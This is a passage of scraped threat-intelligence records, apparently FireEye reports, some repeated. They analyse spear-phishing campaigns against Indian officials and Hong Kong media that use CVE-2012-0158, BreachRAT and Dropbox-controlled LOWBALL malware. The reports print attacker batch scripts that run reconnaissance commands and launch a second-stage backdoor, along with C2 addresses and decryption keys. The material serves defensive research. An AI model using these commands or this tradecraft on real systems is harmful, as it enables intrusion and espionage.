[CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "modified": "2016-06-03T01:30:00", "published": "2016-06-03T01:30:00", "id": "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T08:35:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "modified": "2015-12-01T08:00:00", "published": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:17", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "modified": "2016-06-03T01:30:00", "published": "2016-06-03T01:30:00", "id": "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "modified": "2015-12-01T08:00:00", "published": "2015-12-01T08:00:00", "id": "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "cvelist": ["CVE-2014-6332", "CVE-2012-0158"], "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the 